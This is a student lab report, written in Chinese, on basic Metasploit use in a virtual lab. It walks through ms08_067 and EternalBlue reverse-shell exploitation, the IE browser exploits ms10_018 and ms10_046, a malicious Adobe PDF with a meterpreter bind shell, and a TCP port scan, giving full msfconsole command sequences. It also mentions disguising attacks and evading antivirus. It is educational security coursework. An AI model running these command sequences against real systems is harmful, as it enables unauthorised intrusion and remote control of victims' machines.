2019-2020-2 20174310隋润起《网络对抗技术》Exp6 MSF基础应用
一、实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067
1.2 一个针对浏览器的攻击,如ms11_050
1.3 一个针对客户端的攻击,如Adobe
1.4 成功应用任何一个辅助模块
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的
二、实践过程
攻击机:
- Kali:192.168.80.131
靶机:
- WinXP:192.168.80.134
实验前准备:
检测两个虚拟机能否ping通
刚开始出现靶机能够ping攻击机,而攻击机不能ping靶机的情况
在靶机中通过cmd命令关闭防火墙后,二者能够互相ping通
2.1 一个主动攻击实践
2.1.1 ms08_067漏洞渗透攻击实践
攻击者试探靶机是否存在ms08_067这个漏洞
- nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.80.134
可以看到靶机确实存在这个漏洞
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
//tcp反向回连set LHOST 192.168.80.131
//Kali即攻击方ipset LPORT 4310
//端口set RHOST 192.168.80.134
//xp靶机ip(漏洞端口已经固定)exploit
//攻击
可以看到回连成功
通过一些cmd指令,搜寻靶机的信息
2.1.2MS17_010漏洞渗透攻击实践
使用指令
- nmap --script=vuln 192.168.80.134
看看靶机是否还有其他的漏洞可以实践。
发现还存在MS17_010这个漏洞
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
- use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
//tcp反向回连set LHOST 192.168.80.131
//Kali即攻击方ipset LPORT 4310
//端口set RHOST 192.168.80.134
//xp靶机ip(漏洞端口已经固定)exploit
//攻击
发现回连失败
用show targets命令发现这个漏洞只有win7能够使用
打开win7虚拟机,ipconfig观察IP地址
更改靶机ip地址为192.168.80.131,再次攻击(注意将靶机防火墙关闭)
回连成功
并查看IP信息
2.2针对浏览器的攻击
2.2.1ms10_018漏洞攻击
首先查看浏览器漏洞:
- cd /usr/share/metasploit-framework/modules/exploits/windows/browser
输入 ls 即可看到很多漏洞代码,选择
- ms10_018_ie_behaviors.rb
进入msf,输入
- search ms10_018
寻找相关漏洞模块
依次输入以下指令:
- use exploit/windows/browser/ms10_018_ie_behaviors
- set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.80.131
//Kali即攻击方ipset SRVHOST 192.168.80.131 //设置服务器IP(攻击者IP)
exploit
//攻击
在靶机访问对应网址
查看会话,使用指令
- sessions
选择会话
- sessions 2
并获得靶机的控制权,查看靶机ip信息
命令并不能识别,换一个漏洞 ms10_046再次尝试,过程与上面类似
生成成功,再次访问
再次通过session1进行攻击
这次成功了
2.3 针对客户端的攻击——Adobe攻击
启动msf 输入search adobe查询针对adobe攻击模块
使用
- use windows/fileformat/adobe_cooltype_sing
设置payloads
依次输入下列指令
- set payload windows/meterpreter/bind_tcp
- set RHOST 192.168.80.134 //靶机ip
- set LPORT 4310 //攻击端口
- exploit//生成pdf
生成pdf成功,cp复制到根目录
复制到靶机并在靶机钟打开PDF。
在msf中,用如下指令进行监听
- use exploit/multi/handler //进入监听模块
- set payload windows/meterpreter/bind_tcp //选择攻击载荷
- set RHOST 192.168.80.134//靶机IP
- set LPORT 4310 //攻击端口
- exploit
获得权限,使用ipconfig指令进行验证
成功
3.4成功应用任何一个辅助模块
3.4.1scanner/portscan/tcp(唯一)
进入msf输入【show auxiliary】指令,查看可用的辅助模块。
选择了
- scanner/portscan/tcp
模块,该模块用来探测靶机的开放的tcp端口
依次输入指令
- use scanner/portscan/tcp
- set RHOSTS 192.168.80.134
- exploit
便得到探测结果
三、基础问题回答
4.1用自己的话解释什么是exploit,payload,encode
- exploit就是漏洞的利用,如何利用漏洞,将我们制造的恶意代码传递过去,起到一个通道的作用。
- payload就是一段恶意代码,在靶机的漏洞发挥作用,达到我们某种目的的代码,通过通道传输到靶机,发挥作用。
- encode就是包装,将payload的代码进行改造,变得不那么容易被发现。
4.2离实战还缺些什么技术或步骤
- 我们的实验与实际的生活还是有一定的差距,默认的将防火墙关闭,等等多种预设条件下进行的。要想与实战接轨,就要加强对信息的收集能力,在我们的实验中,实际上对靶机是了如指掌,而实战我们对靶机可能是一无所知,要从零开始对信息进行收集。其次我们的一些后门程序和网址,被攻击方方也不会乖乖的进行访问,我们需要对我们的攻击手段进行伪装,让对方在无意识的情况下被攻击,并且能够绕过一些防护软件的防御。
四、实践总结
这次实验是对于msf的一些简单应用,对于一些特定的漏洞,通过msf的一些工具在靶机上发挥作用。通过这次实验,我学会如何使用msf,遇到不会的就info查看详情,配置参数就是options查看,这样可以让我自己解决一些问题。同时也要加强英语的学习,这样大大的节省了查询单词的时间。